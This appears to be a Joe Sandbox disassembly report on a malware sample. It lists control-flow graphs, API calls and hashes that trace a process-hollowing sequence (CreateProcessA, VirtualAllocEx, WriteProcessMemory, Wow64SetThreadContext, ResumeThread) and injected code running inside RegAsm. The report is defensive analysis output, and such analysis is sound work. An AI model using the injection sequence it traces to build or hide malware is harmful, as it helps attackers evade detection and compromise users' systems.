                                control_flow_graph 66 146076c-1462ba3 69 1462c05-1462c30 66->69 70 1462ba5-1462bd5 66->70 73 1462c92-1462ceb 69->73 74 1462c32-1462c62 69->74 70->69 78 1462bd7-1462bdc 70->78 81 1462ced-1462d1a 73->81 82 1462d4a-1462e36 CreateProcessA 73->82 74->73 89 1462c64-1462c69 74->89 79 1462bde-1462be8 78->79 80 1462bff-1462c02 78->80 83 1462bec-1462bfb 79->83 84 1462bea 79->84 80->69 81->82 97 1462d1c-1462d21 81->97 105 1462e3f-1462f19 82->105 106 1462e38-1462e3e 82->106 83->83 86 1462bfd 83->86 84->83 86->80 90 1462c8c-1462c8f 89->90 91 1462c6b-1462c75 89->91 90->73 94 1462c77 91->94 95 1462c79-1462c88 91->95 94->95 95->95 96 1462c8a 95->96 96->90 99 1462d44-1462d47 97->99 100 1462d23-1462d2d 97->100 99->82 101 1462d31-1462d40 100->101 102 1462d2f 100->102 101->101 104 1462d42 101->104 102->101 104->99 117 1462f1b-1462f1f 105->117 118 1462f29-1462f2d 105->118 106->105 117->118 119 1462f21 117->119 120 1462f2f-1462f33 118->120 121 1462f3d-1462f41 118->121 119->118 120->121 122 1462f35 120->122 123 1462f43-1462f47 121->123 124 1462f51-1462f55 121->124 122->121 123->124 125 1462f49 123->125 126 1462f57-1462f80 124->126 127 1462f8b-1462f96 124->127 125->124 126->127 130 1462f97 127->130 130->130
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,00000000,00000000,03DB3588,03DB358C,01462A95,?,?,?), ref: 01462E23
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 9d731fc8166d7fd7b1f70969464794ef4b4bc6444e42ee94c0bc894e3b4c90e8
                                • Instruction ID: 5524f52a26d2818008981e93447439423757761aed5198cfd226e5f42853e578
                                • Opcode Fuzzy Hash: 9d731fc8166d7fd7b1f70969464794ef4b4bc6444e42ee94c0bc894e3b4c90e8
                                • Instruction Fuzzy Hash: 8BD14A70D002299FDB24DFA8C841BEEBBF5FB09304F0091AAD559B7250DBB49A85CF95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 132 14607ec-1463c87 135 1463c9e-1463cfd WriteProcessMemory 132->135 136 1463c89-1463c9b 132->136 137 1463d06-1463d50 135->137 138 1463cff-1463d05 135->138 136->135 138->137
                                APIs
                                • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 01463CED
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: b2d6f9ff46c87634b142cc9bc001f4d6fc6da7fafc303b8dbe69bacbfc03b348
                                • Instruction ID: dfbf0301079e5db474787e637f5868813c33fc8bf4ce73b7c3913b426adc7d62
                                • Opcode Fuzzy Hash: b2d6f9ff46c87634b142cc9bc001f4d6fc6da7fafc303b8dbe69bacbfc03b348
                                • Instruction Fuzzy Hash: FD4198B5D002589FDB10CFAAD984AEEFBF5BB09314F24902AE818B7350D375A945CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 142 1463c10-1463c87 144 1463c9e-1463cfd WriteProcessMemory 142->144 145 1463c89-1463c9b 142->145 146 1463d06-1463d50 144->146 147 1463cff-1463d05 144->147 145->144 147->146
                                APIs
                                • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 01463CED
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 378719227e7e809fc9c8f94202bb50f5ce8713eb05e79c084d55cbe133f8a785
                                • Instruction ID: 0ac864f9ed5c16947579b8c1d12b13397d7cd39871868eff7b629ef21ca68ed5
                                • Opcode Fuzzy Hash: 378719227e7e809fc9c8f94202bb50f5ce8713eb05e79c084d55cbe133f8a785
                                • Instruction Fuzzy Hash: 254179B5D002589FDB10CFA9D984AEEFBF1BB49314F24902AE818B7250D375A945CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 151 1463390-146345c ReadProcessMemory 154 1463465-14634af 151->154 155 146345e-1463464 151->155 155->154
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0146344C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 721c6365253dade045a8462f4ecb25dc28c5c2d3038bb0c99727f008a0b590cc
                                • Instruction ID: 6fb64782be1b5bedc7f5dceacb87c99089bef4f266f3af8e733ae3603fe8c61b
                                • Opcode Fuzzy Hash: 721c6365253dade045a8462f4ecb25dc28c5c2d3038bb0c99727f008a0b590cc
                                • Instruction Fuzzy Hash: 6D4189B9D052589FCB11CFA9D984ADEFBF1BB09310F14906AE818B7210D335AA46CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 159 14607bc-146345c ReadProcessMemory 162 1463465-14634af 159->162 163 146345e-1463464 159->163 163->162
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0146344C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 4dd409e034c9458a42ec9a0c3538338dcc95f7f20d0abd9412c1b68373610af0
                                • Instruction ID: c3f1c8f352af1e1433e6ce595b501efea337b334819e2427741a0bf3fe2dffc8
                                • Opcode Fuzzy Hash: 4dd409e034c9458a42ec9a0c3538338dcc95f7f20d0abd9412c1b68373610af0
                                • Instruction Fuzzy Hash: D34178B9D042589FCB10CFA9D984ADEFBF5BB09314F14902AE818B7250D375A941CF64

                                Control-flow Graph

                                control_flow_graph 175 1463618-1463660 177 1463668-14636dc VirtualAllocEx 175->177 178 14636e5-1463727 177->178 179 14636de-14636e4 177->179 179->178
                                APIs
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 014636CC
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 897c80332c583e07965672eaf0931cc890cb316d967e01a7f07a2a6f688a38e2
                                • Instruction ID: 0f364a585d08631d9a49190656010b639c7049bf933499e0de25a6d12027198d
                                • Opcode Fuzzy Hash: 897c80332c583e07965672eaf0931cc890cb316d967e01a7f07a2a6f688a38e2
                                • Instruction Fuzzy Hash: 764179B9D052589FCF10CFA9D984A9EFBF5BB09310F24901AE918B7310D735A906CF64

                                Control-flow Graph

                                control_flow_graph 167 14607d4-14636dc VirtualAllocEx 170 14636e5-1463727 167->170 171 14636de-14636e4 167->171 171->170
                                APIs
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 014636CC
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: c10541790890e1a732d8a2b47ed17d60db463a88674b2e0175005ccf649d4dfd
                                • Instruction ID: 67cae69e12f855f30a44de8267ed4545ab8296891ee7e6e6e88510181f8b5610
                                • Opcode Fuzzy Hash: c10541790890e1a732d8a2b47ed17d60db463a88674b2e0175005ccf649d4dfd
                                • Instruction Fuzzy Hash: 2A4168B9D042589FCB10CFA9D984A9EFBB5BB09310F10901AE918B7310D775A901CF64

                                Control-flow Graph

                                control_flow_graph 193 1460804-1463234 196 1463236-1463248 193->196 197 146324b-1463291 Wow64SetThreadContext 193->197 196->197 198 1463293-1463299 197->198 199 146329a-14632de 197->199 198->199
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01463281
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 95cf9115640c83e03a828a97fc6393056eedbd7e17b5671cb195c4d254181c57
                                • Instruction ID: 812f448e1f00b4c17640bf9be22d5d3ce416b61c0c38d70459ab0b9c02f19c7c
                                • Opcode Fuzzy Hash: 95cf9115640c83e03a828a97fc6393056eedbd7e17b5671cb195c4d254181c57
                                • Instruction Fuzzy Hash: 6341AAB4D00258DFCB10CFAAD884AAEFBF4BB49314F10802AE418B7350D374A946CF65

                                Control-flow Graph

                                control_flow_graph 183 1460794-1463234 186 1463236-1463248 183->186 187 146324b-1463291 Wow64SetThreadContext 183->187 186->187 188 1463293-1463299 187->188 189 146329a-14632de 187->189 188->189
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01463281
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: fcd4a080d44816bd4c5fa3a7a360d46ccb58f3fe26b446bd63538e87a41f50ea
                                • Instruction ID: 48bc8b4a23cf042a255192f5393a957ccc31c70e4a2325e9a569a26da0133f7f
                                • Opcode Fuzzy Hash: fcd4a080d44816bd4c5fa3a7a360d46ccb58f3fe26b446bd63538e87a41f50ea
                                • Instruction Fuzzy Hash: E441AAB4D002589FCB10CFAAD884AEEFBF4BB49314F10802AE418B7350D374A946CF55

                                Control-flow Graph

                                control_flow_graph 203 14631c8-1463234 205 1463236-1463248 203->205 206 146324b-1463291 Wow64SetThreadContext 203->206 205->206 207 1463293-1463299 206->207 208 146329a-14632de 206->208 207->208
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01463281
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 2139c2036233a9c27b44b3d205d27e2f8948333075dfeb8405d458e7125b196d
                                • Instruction ID: 930f6edf945ec0662b7754ae34d7d0d545c141c90095182c1261fd14a13f516f
                                • Opcode Fuzzy Hash: 2139c2036233a9c27b44b3d205d27e2f8948333075dfeb8405d458e7125b196d
                                • Instruction Fuzzy Hash: 5C41A9B8D012589FCB14CFAAD884ADEFBF1BB49314F10802AE818B7350D778A946CF55

                                Control-flow Graph

                                control_flow_graph 212 14640b0-1464145 ResumeThread 215 1464147-146414d 212->215 216 146414e-1464188 212->216 215->216
                                APIs
                                • ResumeThread.KERNELBASE(00000000), ref: 01464135
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 442f62f199ef5ca306774cf2d36128c95cee4fc18ba883fb943d2657cd69b2f1
                                • Instruction ID: 0c774caa23cfbbeddad7f7f181ec51c4d00eef8f858160938df6ab9b70f8f840
                                • Opcode Fuzzy Hash: 442f62f199ef5ca306774cf2d36128c95cee4fc18ba883fb943d2657cd69b2f1
                                • Instruction Fuzzy Hash: E23199B8D012589FCB10CFA9D984ADEFBF4AB49314F14905AE814B7310D735A901CFA5

                                Control-flow Graph

                                control_flow_graph 220 146081c-1464145 ResumeThread 223 1464147-146414d 220->223 224 146414e-1464188 220->224 223->224
                                APIs
                                • ResumeThread.KERNELBASE(00000000), ref: 01464135
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: cb59d8827cf7c9883b8b98f25900c72877b95a12a04564c515134c751b5b4e22
                                • Instruction ID: 322968fcc9264bc958fe2defd7afc016aa40718c6695c7055eac226af4bd5b48
                                • Opcode Fuzzy Hash: cb59d8827cf7c9883b8b98f25900c72877b95a12a04564c515134c751b5b4e22
                                • Instruction Fuzzy Hash: 6F3198B8D01218DFCB14DFA9D984A9EFBF4AB09314F14902AE818B7320D775A901CFA5

                                Execution Graph

                                Execution Coverage:1.5%
                                Dynamic/Decrypted Code Coverage:4.9%
                                Signature Coverage:7.7%
                                Total number of Nodes:142
                                Total number of Limit Nodes:12

                                Control-flow Graph

                                control_flow_graph 176 417f53-417f7c call 42fac3 180 417f82-417f90 call 4300c3 176->180 181 417f7e-417f81 176->181 184 417fa0-417fb1 call 42e583 180->184 185 417f92-417f9d call 430363 180->185 190 417fb3-417fc7 LdrLoadDll 184->190 191 417fca-417fcd 184->191 185->184 190->191
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417FC5
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                • Instruction ID: a878203bc698d83f05b7e2fca1152cc0e70717ccebf5934bd4b8571c1c78209f
                                • Opcode Fuzzy Hash: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                • Instruction Fuzzy Hash: 06011EB5E4020DABDF10DBE5DC92FDEB778AB54308F0041AAE90897240F635EB598B95

                                Control-flow Graph

                                control_flow_graph 202 42ce33-42ce6c call 4048f3 call 42e073 NtClose
                                APIs
                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CE67
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction ID: 12d92c16304b53064a5c4291a4558afdafcc0bd6d98ff4256559b717f45b20f5
                                • Opcode Fuzzy Hash: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction Fuzzy Hash: C7E04F762506147BD510BA5ADC11F97775CDFC5714F004469FB0867142C675790186F4

                                Control-flow Graph

                                control_flow_graph 219 2c635c0-2c635cc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 54f2a5a6cd192830bcb2626fa22f81b749441c8994adb30e12741717832aab64
                                • Instruction ID: 172ef4853532301a6c009655ef91acd72bd5d0425f9c2d60804dd30c31ce3de3
                                • Opcode Fuzzy Hash: 54f2a5a6cd192830bcb2626fa22f81b749441c8994adb30e12741717832aab64
                                • Instruction Fuzzy Hash: 8390027164550402D10071584518707100587D0611F65C521A1424568D87958A5175A2

                                Control-flow Graph

                                control_flow_graph 216 2c62b60-2c62b6c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 34fab50f9a628ee3c47a2b14adb459e7bb364e2232611fe07cfe4ae32ea1ceb5
                                • Instruction ID: 456a1e6bc5e047e5961d9168467fcd708b7532e0a98fd2de115bd78af219d491
                                • Opcode Fuzzy Hash: 34fab50f9a628ee3c47a2b14adb459e7bb364e2232611fe07cfe4ae32ea1ceb5
                                • Instruction Fuzzy Hash: 059002A124240003410571584418617400A87E0611B55C131E2014590DC52589917125

                                Control-flow Graph

                                control_flow_graph 217 2c62c70-2c62c7c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: f178149fb8039dfd8ffab4ce1355819a45feb5990a813f14c03ec0abb9f896f2
                                • Instruction ID: 9b25a09ad866013a92a6632b2a7d40a1d172f54af48ab77fe338769dfe9202f2
                                • Opcode Fuzzy Hash: f178149fb8039dfd8ffab4ce1355819a45feb5990a813f14c03ec0abb9f896f2
                                • Instruction Fuzzy Hash: 4590027124148802D1107158840874B000587D0711F59C521A5424658D869589917121

                                Control-flow Graph

                                control_flow_graph 218 2c62df0-2c62dfc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 182a7f2543377770e3d07c69516fb17cc63502039920180c203a0f3717b447c2
                                • Instruction ID: 62218d81ca438c2aaea8fa595705cdd7e6355c759330ab125f4bb8c8615d3729
                                • Opcode Fuzzy Hash: 182a7f2543377770e3d07c69516fb17cc63502039920180c203a0f3717b447c2
                                • Instruction Fuzzy Hash: E390027124140413D11171584508707000987D0651F95C522A1424558D96568A52B121

                                Control-flow Graph

                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: 4bb8949d7952fd6f5e8e45d4105f9153af2bca4304bc491e0bd1dbb5af135acc
                                • Instruction ID: 08783e45b3445f12ea0d109643d2fe1f3c0a7b118079be54961ebfd15e186d8f
                                • Opcode Fuzzy Hash: 4bb8949d7952fd6f5e8e45d4105f9153af2bca4304bc491e0bd1dbb5af135acc
                                • Instruction Fuzzy Hash: BA01E1B2D4115C7ADB00AAD58C81DFF7B7CDF41398F81806AFA14AB141D22C8E078BA5

                                Control-flow Graph

                                control_flow_graph 15 4147ad-4147c5 16 4147cd-41481d call 42f993 call 417f53 call 404863 call 4255b3 15->16 17 4147c8 call 42ef83 15->17 26 41483d-414843 16->26 27 41481f-41482e PostThreadMessageW 16->27 17->16 27->26 28 414830-41483a 27->28 28->26
                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: a8befdf1139e21b3882535c43dbf738675fb9d190012064125ebd954cb9cfc20
                                • Instruction ID: 55e4c84b5d1332bfae79c458348879d2d4c42dde8b1271e511681eabfa8b2cfc
                                • Opcode Fuzzy Hash: a8befdf1139e21b3882535c43dbf738675fb9d190012064125ebd954cb9cfc20
                                • Instruction Fuzzy Hash: 0001E5B2E0115C7ADB10AAE19C81DEF7B7CDF41398F408069FA14BB241D6384E068BA4

                                Control-flow Graph

                                control_flow_graph 29 4147b3-4147c5 30 4147cd-41481d call 42f993 call 417f53 call 404863 call 4255b3 29->30 31 4147c8 call 42ef83 29->31 40 41483d-414843 30->40 41 41481f-41482e PostThreadMessageW 30->41 31->30 41->40 42 414830-41483a 41->42 42->40
                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: d8c847d9b602cc0ef889ac12f254f5617776066c6cf961dec30326a9506bf840
                                • Instruction ID: 1d3746b8afa38300bee756f3e677ba9afac3934325a235b4f4357ff197b049ae
                                • Opcode Fuzzy Hash: d8c847d9b602cc0ef889ac12f254f5617776066c6cf961dec30326a9506bf840
                                • Instruction Fuzzy Hash: DB0104B2D0015C7ADB00AAE18C81DEF7B7CDF40398F408069FA0477240D6388E068BB5

                                Control-flow Graph

                                control_flow_graph 192 42d153-42d194 call 4048f3 call 42e073 RtlAllocateHeap
                                APIs
                                • RtlAllocateHeap.NTDLL(?,0041ECEB,?,?,00000000,?,0041ECEB,?,?,?), ref: 0042D18F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                • Instruction ID: 79292d26c6a9dc3b6d4b7b5f52fefd6cb1c5ad5164505cdca91e487aa7c787f8
                                • Opcode Fuzzy Hash: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                • Instruction Fuzzy Hash: 31E092B22002147BD610EE9AEC41F9B37ACEFC4710F008419FA08A7241D675B91087B8

                                Control-flow Graph

                                control_flow_graph 197 42d1a3-42d1e4 call 4048f3 call 42e073 RtlFreeHeap
                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5A8279,00000007,00000000,00000004,00000000,004177C9,000000F4), ref: 0042D1DF
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
                                • Instruction ID: e239419f071058c402d1cca2ecf357ad84d18736701478b7885498ac9f6fd536
                                • Opcode Fuzzy Hash: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
                                • Instruction Fuzzy Hash: 59E06DB22002147BD614EE59DC42EAB37ADEFC4714F008419FE08A7242D671B91186B8

                                Control-flow Graph

                                control_flow_graph 207 42d1f3-42d22f call 4048f3 call 42e073 ExitProcess
                                APIs
                                • ExitProcess.KERNEL32(?,00000000,00000000,?,A332A5E1,?,?,A332A5E1), ref: 0042D22A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: 1eeef9b814ce5dbdd2fbb078e5355fc083b491a19b32f4d566a365c0cc94f793
                                • Instruction ID: 7d087f7f5858adb128510598b6aeb75ad25227ba0282fc6dd19918f884fa539b
                                • Opcode Fuzzy Hash: 1eeef9b814ce5dbdd2fbb078e5355fc083b491a19b32f4d566a365c0cc94f793
                                • Instruction Fuzzy Hash: 09E08C762016147BE220FB5BDC01F9B77ACDFC5724F01452AFA08A7245CAB5BA0187F4

                                Control-flow Graph

                                control_flow_graph 212 2c62c0a-2c62c0f 213 2c62c11-2c62c18 212->213 214 2c62c1f-2c62c26 LdrInitializeThunk 212->214
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: be8c8499bbaaabb881e276c0a17a26033876924933f31dc08b70949acdcb8d7e
                                • Instruction ID: e94e478d9e4d6c66f453175e3d7590da02bdbbc0a6cab725a56e2a6362a64e19
                                • Opcode Fuzzy Hash: be8c8499bbaaabb881e276c0a17a26033876924933f31dc08b70949acdcb8d7e
                                • Instruction Fuzzy Hash: 84B09B719419C5D9EA11E7604A0C717790167D0711F15C171D7030641E4738C1D1F176
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2160512332
                                • Opcode ID: 577dae99d6e98ebd6837fef4ec34a4e07fd826b02818ef4faa69cd6d95563289
                                • Instruction ID: 7b94b888caddb889840cc1aed6f95868297436b74c113ac432ef320d81cd946c
                                • Opcode Fuzzy Hash: 577dae99d6e98ebd6837fef4ec34a4e07fd826b02818ef4faa69cd6d95563289
                                • Instruction Fuzzy Hash: 0C92AC71608392AFE720CF24C8A4B6BB7E9BF84758F04492DFA95D7250D770E944CB92
                                Strings
                                • Critical section debug info address, xrefs: 02C9541F, 02C9552E
                                • Critical section address, xrefs: 02C95425, 02C954BC, 02C95534
                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02C954E2
                                • corrupted critical section, xrefs: 02C954C2
                                • Thread is in a state in which it cannot own a critical section, xrefs: 02C95543
